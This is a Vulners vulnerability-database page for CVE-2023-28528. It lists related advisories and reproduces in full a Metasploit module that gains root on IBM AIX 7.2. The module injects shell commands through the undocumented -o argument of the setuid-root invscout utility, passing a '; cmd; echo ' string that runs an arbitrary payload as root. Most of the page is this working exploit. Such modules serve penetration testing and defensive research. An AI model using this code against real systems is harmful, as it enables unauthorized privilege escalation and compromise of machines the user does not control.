Vulners
Lucene search
IBM AIX 7.2 inscout Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Security Bulletin: AIX is vulnerable to arbitrary command execution due to invscout (CVE-2023-28528) | 24 Apr 202315:57 | – | ibm |
 | The vulnerability of the invscout command in the IBM AIX operating system, allowing a hacker to execute arbitrary commands | 4 May 202300:00 | – | bdu_fstec |
 | CVE-2023-28528 | 28 Apr 202307:27 | – | circl |
 | IBM AIX 操作系统命令注入漏洞 | 24 Apr 202300:00 | – | cnnvd |
 | IBM AIX Command Execution Vulnerability | 27 Apr 202300:00 | – | cnvd |
 | CVE-2023-28528 | 28 Apr 202302:06 | – | cve |
 | CVE-2023-28528 IBM AIX command execution | 28 Apr 202302:06 | – | cvelist |
 | EUVD-2023-32198 | 3 Oct 202520:07 | – | euvd |
 | AIX is vulnerable to arbitrary command execution due to invscout | 12 Apr 202312:32 | – | aix |
 | invscout RPM Privilege Escalation | 18 May 202319:52 | – | metasploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'invscout RPM Privilege Escalation',
'Description' => %q{
This module exploits a command injection vulnerability in IBM AIX
invscout set-uid root utility present in AIX 7.2 and earlier.
The undocumented -rpm argument can be used to install an RPM file;
and the undocumented -o argument passes arguments to the rpm utility
without validation, leading to command injection with effective-uid
root privileges.
This module has been tested successfully on AIX 7.2.
},
'Author' => [
'Tim Brown', # Discovery and PoC
'bcoles' # Metasploit
],
'References' => [
['CVE', '2023-28528'],
['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
],
'Platform' => %w[unix aix],
'Arch' => ARCH_CMD,
'Payload' => {
'BadChars' => "\x00\x0a\x0d\x22",
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet openssl'
}
},
'DefaultOptions' => {
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork' => true
},
'SessionTypes' => %w[shell meterpreter],
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-04-24',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
])
end
def invscout_path
datastore['INVSCOUT_PATH']
end
def check
return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)
res = execute_command('id')
id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s
return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')
CheckCode::Vulnerable("Output: #{id}")
end
def execute_command(cmd, _opts = {})
rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
rpm_args = "; #{cmd}; echo "
res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
vprint_line(res) unless res.blank?
res
end
def exploit
execute_command(payload.encoded)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2023 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.8 - 8.4
EPSS0.01709
SSVC